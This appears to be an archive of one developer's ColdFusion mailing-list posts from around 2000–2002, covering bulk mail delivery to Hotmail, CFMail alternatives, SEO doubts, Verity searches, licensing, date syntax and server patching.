At 00:03 04/04/2002 Don Vawter said I send out about 700 email messages a day to people who have signed up to receive a daily cryptogram. If I send them all at once nearly all of the message to hotmail accounts bounce. If I space them throughout the day they get delivered. Apparently hotmail interprets multiple emails in a short period of time as spam and rejects them. Does anyone have a solution for this? I have tried using a different return email address on each message but that makes no difference. I have communicated the problem to Hotmail's customer service but that is worse than talking to a wall. I think you need to deliver the mails to Hotmail in bunches of 8 or less at a time. If you are using CF mail I do not think you can vary this. We solved this fairly easily using iMS as you can set the Max Recipients in the tag used to send the mail. Wall's at least are clearly in existence I am not sure the same can be said about Hotmail's service. The SMPTO is a comma delimited list of email address you wish to deliver to. If you were wanting to have a BCC then they would go in there. Header_To is the address that the recipient will see so you might put Fred Jones [EMAIL PROTECTED] When Fred gets the mail he can not see any or all of the other address in the SMPTO header but all of those will see that it was sent to Fred. Header_from is : Header_FROM=Fred Smith [EMAIL PROTECTED] or Header_from=#form.name# #form.email# In your case to send the copy to your mailbox just add the address in the smpto header. Search Engines
I have a client with a new CF site where the pages are created dynamically form several CfIncludes. The client has used a SE optimization company that they employed in the past who have now sent me some changes that they want me to incorporate on the site. From a conversation I had with them they do not appear to know much about dynamic sites and I wanted some reassurance before relying on their expertise in SEO. Most of the changes are links contained within noscript /noscript tags so they do not show on the page. ( Well unless you are using Netscape 2.00 or below I believe.) This may be a very clever utilization and perfectly legitimate use of a little used tag, it may even be a totally brilliant idea. However, I would welcome comments from others on this as a technique for enhancing placement in search engines for cf sites or others before I use it on my client's site. Re: New CF Whois tag?
Hi Lewis, I am attempting to use your TCP Client and although I have managed to use it for your examples I fear that in the real world example where I need to use it I am struggling. It is at the very edge of my abilities and experience. I have to talk to an SMS message gateway and I have the TCP/IP spec some asp examples but I am still struggling I have attached the zip file with the specs from these guys. I know this is very presumptuous and if you are too busy I do understand. I am happy to pay for your time if you could just give me a couple of working examples. I had the syem all working beautifully from another supplier (using an http post) only to find that all of a sudden they have problems with their UK Gateway which is essential as it is where I and my clients are based. They did not know that until I advised them and they are talking about a month to fix it. In the meantime I have a bunch of clients who I had demonstrated this working all now anxious to go and I am stuffed. This new supplier seems a better bet but only have a TCP/IP connection or email connection but the email will not allow me to set the sender ID. I have always been grateful for your contributions on the list and hope that you do not mind mailing you direct. I am happy to pay for your time if you have any spare. RE: How do people work around the current limited cfmail
At 19:15 10/12/2001 Tony Gruen said Thnk you for the link, I will check it out. I agree on the user format trouble. We are validating the format pretty heavily and all emails seem to be correctly formatted. Our tests are not even going anywhere. This is a well known issue, however, careful monitoring and resending or restarting the server has kept us going in the past. Now nothing helps. Tony Gruen To answer the question in the Subject. We use Howie's or rather his company's CFX and his SE iMS. We never have any problems. It is much more flexible, more powerful, the support is great and it just sends the mail. I have lost track of the pricing but the SE version is a bargain. I think the annual licence is $80.00 or so. The reason I mention this is that I know some folk get confused and think they need the full iMS mail server with POP SMTP etc etc. Also that if they are running a full mail server on the same box they can not use it. The SE is only a Post server it can happily reside on a server that has another mail server running alongside. To replace CFMail just use the SE version I am sure there is a trial version you can download and test. We have it running on a Box with CF, web server, and mail server that churns out a fair bit of mail on some tech support lists. I just wish I could resolve some other issues as easily as iMS resolved the CF mail problem. We have customers who can log on and generate a mailing of 10,000. It never concerns us, would not want to rely of CFMail for that. Not fair to compare the two anyway as delivering it straight to an efficient Post Server is bound to be better and more efficient. Mystery to me why everyone isn't using it. Mail Howie or join the iMS support list if you have any real technical questions. Gordon ~~ Your ad could be here. Re: Verity error?
The verity search is case sensitive. It could be that one of the Franks is mixed case. frank or Frank It is a good idea to change the search text to uppercase using #UCASE(searchtext)# function if you can as this will remove this problem. Gordon At 16:36 07/05/01 +0800 David Siew said Hi all, I am having some problems with the indexing of Verity collections. I am trying to index an SQL query from an Access database. Its a simple query where I selected the ID, Name from a table. The collection has been defined in CFAdmin and I updated the collection as below: cfindex action=update collection=Names key=customer_ID type=CUSTOM title=CustomerName query=getNames body=customername language=English Afterwhich I tried searching for records containing the word frank. There were at least 4 franks in the whole database but it kept giving me only 3 of them. I have tried recreating the collection but it still left out the last frank. Is there anyway I can see what Verity has indexed? I displayed the query results directly and the results seemed to be correct. Thanks David ~~ Structure your ColdFusion code with Fusebox. Re: New CF5 Partner Hosting License
At 14:19 26/04/01 -0400 Howie Hamlin said Here's a real interesting line from the announcement: The ColdFusion 5 Enterprise and Pro End-User License will no longer permit multiple ColdFusion applications and/or sites to be hosted on a single ColdFusion server. What the heck does this mean? What is the definitiion of multiple CF applications? If I create more than one application on a server then I need to pay more $$$? Does this mean they may be pricing it to handle one application per Domain. Along the lines of some mail servers where you pay more to handle multiple Domains? I do not see how else they can differentiate Multiple Cold Fusion applications. It is the or sites that sounds like this is what they mean. Or am I way off track. Perhaps the base price will be less and you purchase a 10/20/50 or whatever Domains licence as required? Certainly sounds like a major change. Gordon ~~ Structure your ColdFusion code with Fusebox. RE: CF Based EMail Mailing LIst?
At 13:40 18/03/01 -0800 Jason E Miller said I doubt someone who wants to send mail to a measly 1600 people is going to want to spend $4,900.00 dollars on a mail program. I have done quite a bit of work with CFMAIL and integrating it into our Newsletter database and it has performed quite well. Just out of curiosity and not in anyway to start a flame war (I have not tested coolfusion's product so this is in no way a knock on it) I would like to hear the problems you have had when using custom written apps and CFMAIL? I especially like the simplicity of being able to send a personalized e-mail to every person on your list using CFMAIL - right down to inserting the custom information they have requested. The principle failing on CFMail is that it will choke on high volumes and if the recipients mail server is down no retries are even attempted. Hence the various custom tags written to re-schedule undeliverable mail. If you move them over from the undeliverable dir into the spool again you will find that another bunch will go. You can keep on doing this until you have a hard core of undeliverable. I would agree that $4900.00 would be a lot to handle 1600 emails but I think you have missed the crux of the matter, in that Post SE is, or was $75.00 per annum. The price you are talking about is for the full suite of Ims server I presume. You do not require that for the purpose we are discussing and the PostSE sits and runs along side my main mail server on the same machine as happy as Larry. I am sure Howie can explain this better than I as well as clarify the pricing and what you need to run it. Gordon ~~ Structure your ColdFusion code with Fusebox. ParseDog and Mr Bean?
I have no idea who Mr Bean is or where he has come from, nor do I recall any previous contributions being posted to this list from Mr Bean. I am deeply suspicious of anyone who uses the name Mr Bean (For those who are not aware, the character of Mr Bean is played to great effect by Rowan Atkinson here in the UK where the character is a particularly ineffective and idiotic comic buffoon). Mr Bean's email address of PT Barnum does not inspire me with confidence about the posters identity or their genuine interest in our community. RE: remote server response
Hi Jeff, If this tag is going to be made available generally may I join the queue already forming. Kind regards Gordon At 11:03 08/01/01 -0500 Jeff Sarsoun said Jennifer, I'm finishing up a CFX tag that will do what you need. Right now what you can do is write a script that will parse through your templates extracting out http, ftp, or mailto: tags. You can dump these into a table then as a scheduled task you could cfx_http to the address to get the response code from the server, then not show the link if it returns anything other than 200 and send you an email to let you know. Jeff Sarsoun -Original Message- From: Jennifer [mailto:[EMAIL PROTECTED]] Sent: Friday, January 05, 2001 3:09 PM To: CF-Talk Subject: remote server response I'm looking for ideas because I'm not sure how to go about this. I'm setting up some pages that are going to have links to external sites. I know how bad it looks to have broken links so I'd like to check the links on a schedule and remove any links that are broken. I'll still get some broken inks but it's better than using up my server resources checking links every time a page loads. At any rate, I'm not sure quite how to check the links in the way I'd like to. I'm considered trying CFHTTP method="get" ... throwonerror="yes" but I'm not sure that it will do what I want it to do. In some cases I want to make sure that the server is responding (because I don't have a specific file to point to) and in some cases I want to make sure there isn't a 404 error (because I do have a specific file to point to). This would probably work for a 404 error but frankly, I didn't understand the section of the CFML Language Reference that talked about whether a filename is required for CFHTTP. To be honest, I don't even want to get the file-- I just want to make sure it is available. I don't have access to these servers so I can't put a dummy file on the server to get to make sure the server is responding. Is there a better way to do this that I'm missing? At 09:21 19/08/00 -0700 paul smith said Well, I have to disagree. For lists up to 3,000 or so, (the limit of my experience with CF-driven lists) a CF-driven list server offers flexibility and features others do not, such as dynamically selected message content that varies for each subscriber. This is a must feature in the age of one-to-one marketing. I think we have a case of misunderstanding, what you describe is not what I call a list. You are describing an email newsletter, a sophisticated event driven newsletter but a one way email process. There are several CF mail tags that will handle that well we use the iMS SE Post server for deliveries in excess of 5000 in very similar fashion to your service. However, when it comes to a list where the email communication is automated both ways CF is not what you want. If you need a List server you need a List server. I was pointing out that the iMS server is a high quality mail/list server engine that happens to be controlled and configured by CF templates that you write. I think the only thing we disagree on is our use of terms! import a csv file
What is the best way to tackle the import of a csv file. Unlikely to exceed 300 records 15 fields each record. Initially appending it to an existing Access table. Should I use the CFX_http tag? The file will be uploaded to the server at a fixed time each day. All tips and suggestions appreciated. More Records from long query
I have a form where the user can check up 10 check boxes. These relate to Yes No fields The form passes the information to a search " find me one where A is Yes and D is YES and G is YES. This often brings up 100 records if not many check boxes are ticked. I need to restrict the listing to 20 at a time. With a next 20 records link. It is not the next 20 records logic that is causing me to stop and think but the way to pass the check box values to the next record selection. Appending them to the next records URL could create a very long string. Is it best to use a form button and simply populate the hidden fields with the values and only put the button up if there are more records? To further complicate the issue ideally I need to randomize the display. This has made me think I should grab the ID key fields of all that meet the criteria from the original query. randomize these numbers, create a list, and loop though the list 20 at a time. What would you recommend? All thoughts and suggestions appreciated. Re: OT: mail transfer agents
At 10:51 14/07/00 -0400 [EMAIL PROTECTED] said I need to set up my own mail transfer agent (MTA) to accept outbound mail from CF, as the local infrastructure only supports authenticated SMTP. My traffic level is relatively low, hundreds of message per day max. I would put it on a dedicated box, and want to configure it to only accept mail from my servers. I'm aware of sendmail qmail IIS smtp service exim smail ssmtp zmailer Any suggestions or opinions? If it is simply outgoing Mail from CF you could use inFusion POST Server Special Edition http://www.coolfusion.com/post_se.htm We are using it for all new applications on a server with an existing mail server rather than using the existing SMTP to send the mail. Faultless performance so far and with CC, BCC, wordwrap in the body the CFX Tag is much more flexible than the CF Mail tag. Going straight to the post server of course is faster as well. It has resolved a lot of CF mail issues for us. First and last day of Month
cfset Startdate=#DateFormat(CreateDate(Year(Now()),Month(Now())-1,01),"dd mm yy")# will give me the first day of June ie the first day of last month. I am struggling to get syntax for the last day of the month. I have tried using days in month but can not seem to get the syntax correct there. I also need to work in European date format dd mm yy. You could also consider Online Data Systems CFX_IMS Special Edition post server if you are using your own server. It has built in word wrap, BCC, the ability to add any manner of headers, including the receipt requested mentioned in another posting. It has resolved many problems with CFmail for us. Web Cameras and CF
Client has decided he wants to have a Web cam (Exterior) looking over an admittedly super beach next to his hotel. It can get spectacularly wild. So far so good, however he wants to update the pic every 20 mins and have every third one stored so users can see what it was like on the hour any day of the year 7.am to 7pm. Never worked with a Web cam but suspect there are some on the list who have considered, if not implemented this sort of stuff and would welcome some suggestions on any aspect. Hardware, Do's , Don'ts, Gotchas etc. Web resources and even example sites would all be helpful. The existing site is CF driven so some sort of reference and path to the image stored in a table seems to be the most sensible route. RE: cf_stockgrabber
Can I just make it clear that I just slightly modified the original work, my small modifications were a trivial matter compared to the skill of the original developer Rob Bilson. Apologies if anyone misunderstood my posting. http://uk.finance.yahoo.com/quote.csv?symbols=ICI*L+KLN*L+BOC*L+FTSE *Ldetailed=s This used to deliver a CSV file it no longer does. http://uk.finance.yahoo.com/d/quotes.csv?s=cccm=Lf=sl1t1c1ghove=.csv It will only allow you one stock at a time. That is quite simillar to the URL the cf_stockgrabber tag that you built, I tried adapting your code but without any success at all If one could find a site that allowed you to personalize a portfolio, then doenload same in csv file then I think it would all be doable. This is fine I think for personal use but using to supply content to a public site is of course not acceptable due to copyright. It may be of course that this is exactly why Yahoo has amended their site. It may be that if the tag works on US quotes one could adapt it with London Symbols which I think could mean trying it with a -L or *L after the symbol. Let me know if that works. Re: ::$DATA Issue again
At 13:42 02/04/00 -0400 Nick McClure said Was SP6a but on before or after IIS? If it was put on before IIS then the part that says do not allow the ::$DATA may have been overwritten. When i set up a box I always put the latest SP on, then Install IIS then the SP again. So you may just want to put SP6a on the box again and see if that helps. I am not sure what order but I think it must have been NT 4.00 followed by the Service pack then the option Pack so you are probably correct.
